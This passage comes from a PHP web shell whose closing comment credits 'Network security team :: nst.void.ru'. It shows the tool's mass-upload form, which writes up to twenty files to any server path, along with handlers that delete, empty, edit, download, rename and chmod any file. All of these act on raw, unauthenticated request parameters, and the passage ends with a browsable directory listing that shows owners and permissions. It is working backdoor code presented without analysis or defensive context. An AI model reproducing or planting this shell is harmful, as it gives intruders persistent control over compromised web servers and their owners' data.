1833 if(@$_GET['t']=="massupload"){
1834 echo "
1835 Mass upload:<br>
1836 <form enctype=\"multipart/form-data\" method=post>
1837 <input type=file name=text1 size=43> <input type=file name=text11 size=43><br>
1838 <input type=file name=text2 size=43> <input type=file name=text12 size=43><br>
1839 <input type=file name=text3 size=43> <input type=file name=text13 size=43><br>
1840 <input type=file name=text4 size=43> <input type=file name=text14 size=43><br>
1841 <input type=file name=text5 size=43> <input type=file name=text15 size=43><br>
1842 <input type=file name=text6 size=43> <input type=file name=text16 size=43><br>
1843 <input type=file name=text7 size=43> <input type=file name=text17 size=43><br>
1844 <input type=file name=text8 size=43> <input type=file name=text18 size=43><br>
1845 <input type=file name=text9 size=43> <input type=file name=text19 size=43><br>
1846 <input type=file name=text10 size=43> <input type=file name=text20 size=43><br>
1847 <input name=where size=43 value='$d'><br>
1848 <input type=submit value=Upload name=massupload>
1849 </form><br>";
1850 
1851 if(@$_POST['massupload']){
1852 $where=@$_POST['where'];
1853 $uploadfile1 = "$where/".@$_FILES['text1']['name'];
1854 $uploadfile2 = "$where/".@$_FILES['text2']['name'];
1855 $uploadfile3 = "$where/".@$_FILES['text3']['name'];
1856 $uploadfile4 = "$where/".@$_FILES['text4']['name'];
1857 $uploadfile5 = "$where/".@$_FILES['text5']['name'];
1858 $uploadfile6 = "$where/".@$_FILES['text6']['name'];
1859 $uploadfile7 = "$where/".@$_FILES['text7']['name'];
1860 $uploadfile8 = "$where/".@$_FILES['text8']['name'];
1861 $uploadfile9 = "$where/".@$_FILES['text9']['name'];
1862 $uploadfile10 = "$where/".@$_FILES['text10']['name'];
1863 $uploadfile11 = "$where/".@$_FILES['text11']['name'];
1864 $uploadfile12 = "$where/".@$_FILES['text12']['name'];
1865 $uploadfile13 = "$where/".@$_FILES['text13']['name'];
1866 $uploadfile14 = "$where/".@$_FILES['text14']['name'];
1867 $uploadfile15 = "$where/".@$_FILES['text15']['name'];
1868 $uploadfile16 = "$where/".@$_FILES['text16']['name'];
1869 $uploadfile17 = "$where/".@$_FILES['text17']['name'];
1870 $uploadfile18 = "$where/".@$_FILES['text18']['name'];
1871 $uploadfile19 = "$where/".@$_FILES['text19']['name'];
1872 $uploadfile20 = "$where/".@$_FILES['text20']['name'];
1873 if (@move_uploaded_file(@$_FILES['text1']['tmp_name'], $uploadfile1)) {
1874 $where=str_replace("\\\\","\\",$where);
1875 echo "<i>Uploaded to $uploadfile1</i><br>";}
1876 if (@move_uploaded_file(@$_FILES['text2']['tmp_name'], $uploadfile2)) {
1877 $where=str_replace("\\\\","\\",$where);
1878 echo "<i>Uploaded to $uploadfile2</i><br>";}
1879 if (@move_uploaded_file(@$_FILES['text3']['tmp_name'], $uploadfile3)) {
1880 $where=str_replace("\\\\","\\",$where);
1881 echo "<i>Uploaded to $uploadfile3</i><br>";}
1882 if (@move_uploaded_file(@$_FILES['text4']['tmp_name'], $uploadfile4)) {
1883 $where=str_replace("\\\\","\\",$where);
1884 echo "<i>Uploaded to $uploadfile4</i><br>";}
1885 if (@move_uploaded_file(@$_FILES['text5']['tmp_name'], $uploadfile5)) {
1886 $where=str_replace("\\\\","\\",$where);
1887 echo "<i>Uploaded to $uploadfile5</i><br>";}
1888 if (@move_uploaded_file(@$_FILES['text6']['tmp_name'], $uploadfile6)) {
1889 $where=str_replace("\\\\","\\",$where);
1890 echo "<i>Uploaded to $uploadfile6</i><br>";}
1891 if (@move_uploaded_file(@$_FILES['text7']['tmp_name'], $uploadfile7)) {
1892 $where=str_replace("\\\\","\\",$where);
1893 echo "<i>Uploaded to $uploadfile7</i><br>";}
1894 if (@move_uploaded_file(@$_FILES['text8']['tmp_name'], $uploadfile8)) {
1895 $where=str_replace("\\\\","\\",$where);
1896 echo "<i>Uploaded to $uploadfile8</i><br>";}
1897 if (@move_uploaded_file(@$_FILES['text9']['tmp_name'], $uploadfile9)) {
1898 $where=str_replace("\\\\","\\",$where);
1899 echo "<i>Uploaded to $uploadfile9</i><br>";}
1900 if (@move_uploaded_file(@$_FILES['text10']['tmp_name'], $uploadfile10)) {
1901 $where=str_replace("\\\\","\\",$where);
1902 echo "<i>Uploaded to $uploadfile10</i><br>";}
1903 if (@move_uploaded_file(@$_FILES['text11']['tmp_name'], $uploadfile11)) {
1904 $where=str_replace("\\\\","\\",$where);
1905 echo "<i>Uploaded to $uploadfile11</i><br>";}
1906 if (@move_uploaded_file(@$_FILES['text12']['tmp_name'], $uploadfile12)) {
1907 $where=str_replace("\\\\","\\",$where);
1908 echo "<i>Uploaded to $uploadfile12</i><br>";}
1909 if (@move_uploaded_file(@$_FILES['text13']['tmp_name'], $uploadfile13)) {
1910 $where=str_replace("\\\\","\\",$where);
1911 echo "<i>Uploaded to $uploadfile13</i><br>";}
1912 if (@move_uploaded_file(@$_FILES['text14']['tmp_name'], $uploadfile14)) {
1913 $where=str_replace("\\\\","\\",$where);
1914 echo "<i>Uploaded to $uploadfile14</i><br>";}
1915 if (@move_uploaded_file(@$_FILES['text15']['tmp_name'], $uploadfile15)) {
1916 $where=str_replace("\\\\","\\",$where);
1917 echo "<i>Uploaded to $uploadfile15</i><br>";}
1918 if (@move_uploaded_file(@$_FILES['text16']['tmp_name'], $uploadfile16)) {
1919 $where=str_replace("\\\\","\\",$where);
1920 echo "<i>Uploaded to $uploadfile16</i><br>";}
1921 if (@move_uploaded_file(@$_FILES['text17']['tmp_name'], $uploadfile17)) {
1922 $where=str_replace("\\\\","\\",$where);
1923 echo "<i>Uploaded to $uploadfile17</i><br>";}
1924 if (@move_uploaded_file(@$_FILES['text18']['tmp_name'], $uploadfile18)) {
1925 $where=str_replace("\\\\","\\",$where);
1926 echo "<i>Uploaded to $uploadfile18</i><br>";}
1927 if (@move_uploaded_file(@$_FILES['text19']['tmp_name'], $uploadfile19)) {
1928 $where=str_replace("\\\\","\\",$where);
1929 echo "<i>Uploaded to $uploadfile19</i><br>";}
1930 if (@move_uploaded_file(@$_FILES['text20']['tmp_name'], $uploadfile20)) {
1931 $where=str_replace("\\\\","\\",$where);
1932 echo "<i>Uploaded to $uploadfile20</i><br>";}
1933 }
1934 echo $copyr;
1935 exit;}
1936 
1937 if(@$_GET['yes']=="yes"){
1938 $d=@$_GET['d']; $e=@$_GET['e'];
1939 unlink($d."/".$e);
1940 $delresult="Success $d/$e deleted <meta http-equiv=\"REFRESH\" content=\"2;URL=$php_self?d=$d\">";
1941 }
1942 if(@$_GET['clean']=="1"){
1943 @$e=$_GET['e'];
1944 $x=fopen("$d/$e","w");
1945 fwrite($x,"");
1946 echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=".@$e."\">";
1947 exit;
1948 }
1949 
1950 
1951 if(@$_GET['e']){
1952 $d=@$_GET['d'];
1953 $e=@$_GET['e'];
1954 $pinf=pathinfo($e);
1955 if(in_array(".".@$pinf['extension'],$images)){
1956 echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e&img=1\">";
1957 exit;}
1958 $filename="$d/$e";
1959 $fd = @fopen ($filename, "r");
1960 $c = @fread ($fd, @filesize ($filename));
1961 $c=htmlspecialchars($c);
1962 $de=$d."/".$e;
1963 $de=str_replace("//","/",$de);
1964 if(is_file($de)){
1965 if(!is_writable($de)){echo "<font color=red>READ ONLY</font><br>";}}
1966 echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
1967 echo "
1968 File contents:<br>
1969 $de
1970 <br>
1971 <table width=100% border=1 cellpadding=0 cellspacing=0>
1972 <tr><td><pre>
1973 $c
1974 
1975 </pre></td></tr>
1976 </table>
1977 
1978 ";
1979 
1980 if(@$_GET['delete']=="1"){
1981 $delete=$_GET['delete'];
1982 echo "
1983 DELETE: Are you sure?<br>
1984 <a href=\"$php_self?d=$d&e=$e&delete=".@$delete."&yes=yes\">Yes</a> || <a href='$php_self?no=1'>No</a>
1985 <br>
1986 ";
1987 if(@$_GET['yes']=="yes"){
1988 @$d=$_GET['d']; @$e=$_GET['e'];
1989 echo $delresult;
1990 }
1991 if(@$_GET['no']){
1992 echo "<meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$e\">
1993 ";
1994 }
1995 
1996 
1997 } #end of delete
1998 echo $copyr;
1999 exit;
2000 } #end of e
2001 
2002 if(@$_GET['edit']=="1"){
2003 @$d=$_GET['d'];
2004 @$ef=$_GET['ef'];
2005 $e=$ef;
2006 if(is_file($d."/".$ef)){
2007 if(!is_writable($d."/".$ef)){echo "<font color=red>READ ONLY</font><br>";}}
2008 echo "[<a href='$php_self?d=$d&del_f=1&wich_f=$e'>Delete</a>] [<a href='$php_self?d=$d&ef=$e&edit=1'>Edit</a>] [<a href='$php_self?d=$d&e=$e&clean=1'>Filesize to 0 byte</a>] [<a href='$php_self?d=$d&e=$e&replace=1'>Replace text in file</a>] [<a href='$php_self?d=$d&download=$e'>Download</a>] [<a href='$php_self?d=$d&rename=1&wich_f=$e'>Rename</a>] [<a href='$php_self?d=$d&chmod=1&wich_f=$e'>CHMOD</a>] [<a href='$php_self?d=$d&ccopy_to=$e'>Copy</a>]<br>";
2009 $filename="$d/$ef";
2010 $fd = @fopen ($filename, "r");
2011 $c = @fread ($fd, @filesize ($filename));
2012 $c=htmlspecialchars($c);
2013 $de=$d."/".$ef;
2014 $de=str_replace("//","/",$de);
2015 echo "
2016 Edit:<br>
2017 $de<br>";
2018 
2019 if(!@$_POST['save']){
2020 print "
2021 <form method=post>
2022 <input name=filename value='$d/$ef'>
2023 <textarea cols=143 rows=30 name=editf>$c</textarea>
2024 <br>
2025 <input type=submit name=save value='Save changes'></form><br>
2026 ";
2027 }
2028 if(@$_POST['save']){
2029 $editf=@$_POST['editf'];
2030 
2031 if(get_magic_quotes_runtime() or get_magic_quotes_gpc()){
2032 $editf=stripslashes($editf);
2033 }
2034 
2035 $f=fopen($filename,"w+");
2036 fwrite($f,"$editf");
2037 echo "<br>
2038 <b>File edited.</b>
2039 <meta http-equiv=\"REFRESH\" content=\"0;URL=$php_self?d=$d&e=$ef\">";
2040 exit;
2041 }
2042 echo $copyr;
2043 exit;
2044 }
2045 
2046 
2047 
2048 echo"
2049 <table width=100% cellpadding=1 cellspacing=0 class=hack>
2050 <tr><td bgcolor=#519A00><center><b>Filename</b></td><td bgcolor=#519A00><center><b>Tools</b></td><td bgcolor=#519A00><b>Size</b></td><td bgcolor=#519A00><center><b>Owner/Group</b></td><td bgcolor=#519A00><b>Perms</b></td></tr>
2051 ";
2052 $dirs=array();
2053 $files=array();
2054 $dh = @opendir($d) or die("<table width=100%><tr><td><center>Permission Denied or Folder/Disk does not exist</center><br>$copyr</td></tr></table>");
2055 while (!(($file = readdir($dh)) === false)) {
2056 if ($file=="." || $file=="..") continue;
2057 if (@is_dir("$d/$file")) {
2058       $dirs[]=$file;
2059 }else{
2060       $files[]=$file;
2061       }
2062    sort($dirs);
2063    sort($files);
2064 
2065 $fz=@filesize("$d/$file");
2066 }
2067 
2068 function perm($perms){
2069 if (($perms & 0xC000) == 0xC000) {
2070    $info = 's';
2071 } elseif (($perms & 0xA000) == 0xA000) {
2072    $info = 'l';
2073 } elseif (($perms & 0x8000) == 0x8000) {
2074    $info = '-';
2075 } elseif (($perms & 0x6000) == 0x6000) {
2076    $info = 'b';
2077 } elseif (($perms & 0x4000) == 0x4000) {
2078    $info = 'd';
2079 } elseif (($perms & 0x2000) == 0x2000) {
2080    $info = 'c';
2081 } elseif (($perms & 0x1000) == 0x1000) {
2082    $info = 'p';
2083 } else {
2084    $info = 'u';
2085 }
2086 $info .= (($perms & 0x0100) ? 'r' : '-');
2087 $info .= (($perms & 0x0080) ? 'w' : '-');
2088 $info .= (($perms & 0x0040) ?
2089            (($perms & 0x0800) ? 's' : 'x' ) :
2090            (($perms & 0x0800) ? 'S' : '-'));
2091 $info .= (($perms & 0x0020) ? 'r' : '-');
2092 $info .= (($perms & 0x0010) ? 'w' : '-');
2093 $info .= (($perms & 0x0008) ?
2094            (($perms & 0x0400) ? 's' : 'x' ) :
2095            (($perms & 0x0400) ? 'S' : '-'));
2096 $info .= (($perms & 0x0004) ? 'r' : '-');
2097 $info .= (($perms & 0x0002) ? 'w' : '-');
2098 $info .= (($perms & 0x0001) ?
2099            (($perms & 0x0200) ? 't' : 'x' ) :
2100            (($perms & 0x0200) ? 'T' : '-'));
2101 return $info;
2102 }
2103 
2104 
2105 for($i=0; $i<count($dirs); $i++){
2106 
2107 $perms = @fileperms($d."/".$dirs[$i]);
2108 $owner = @fileowner($d."/".$dirs[$i]);
2109 if($os=="unix"){
2110 $fileownera=posix_getpwuid($owner);
2111 $owner=$fileownera['name'];
2112 }
2113 $group = @filegroup($d."/".$dirs[$i]);
2114 if($os=="unix"){
2115 $groupinfo = posix_getgrgid($group);
2116 $group=$groupinfo['name'];
2117 }
2118 $info=perm($perms);
2119 if($i%2){$color="#D7FFA8";}else{$color="#D1D1D1";}
2120 $linkd="<a href='$php_self?d=$d/$dirs[$i]'>$dirs[$i]</a>";
2121 $linkd=str_replace("//","/",$linkd);
2122 echo "<tr><td bgcolor=$color><font face=wingdings size=2>0</font> $linkd</td><td bgcolor=$color><center><font color=blue>DIR</font></td><td bgcolor=$color>&nbsp;</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
2123 }
2124 
2125 for($i=0; $i<count($files); $i++){
2126 
2127 $size=@filesize($d."/".$files[$i]);
2128 $perms = @fileperms($d."/".$files[$i]);
2129 $owner = @fileowner($d."/".$files[$i]);
2130 if($os=="unix"){
2131 $fileownera=posix_getpwuid($owner);
2132 $owner=$fileownera['name'];
2133 }
2134 $group = @filegroup($d."/".$files[$i]);
2135 if($os=="unix"){
2136 $groupinfo = posix_getgrgid($group);
2137 $group=$groupinfo['name'];
2138 }
2139 $info=perm($perms);
2140 if($i%2){$color="#D1D1D1";}else{$color="#D7FFA8";}
2141 
2142 if ($size < 1024){$siz=$size.' b';
2143 }else{
2144 if ($size < 1024*1024){$siz=number_format(($size/1024), 2, '.', '').' kb';}else{
2145 if ($size < 1000000000){$siz=number_format($size/(1024*1024), 2, '.', '').' mb';}else{
2146 if ($size < 1000000000000){$siz=number_format($size/(1024*1024*1024), 2, '.', '').' gb';}
2147 }}}
2148 echo "<tr><td bgcolor=$color><font face=wingdings size=3>2</font> <a href='$php_self?d=$d&e=$files[$i]'>$files[$i]</a></td><td bgcolor=$color><center><a href=\"javascript:ShowOrHide('$i','')\">[options]</a><div id='$i' style='display:none;z-index:1;' ><a href='$php_self?d=$d&ef=$files[$i]&edit=1' title='Edit $files[$i]'><b>Edit</b></a><br><a href='$php_self?d=$d&del_f=1&wich_f=$files[$i]' title='Delete $files[$i]'><b>Delete</b></a><br><a href='$php_self?d=$d&chmod=1&wich_f=$files[$i]' title='chmod $files[$i]'><b>CHMOD</b></a><br><a href='$php_self?d=$d&rename=1&wich_f=$files[$i]' title='Rename $files[$i]'><b>Rename</b></a><br><a href='$php_self?d=$d&download=$files[$i]' title='Download $files[$i]'><b>Download</b></a><br><a href='$php_self?d=$d&ccopy_to=$files[$i]' title='Copy $files[$i] to?'><b>Copy</b></a></div></td><td bgcolor=$color>$siz</td><td bgcolor=$color><center>$owner/$group</td><td bgcolor=$color>$info</td></tr>";
2149 }
2150 
2151 echo "</table></td></tr></table>";
2152 echo $copyr;
2153 
2154 ?>
2155 <!-- Network security team :: nst.void.ru -->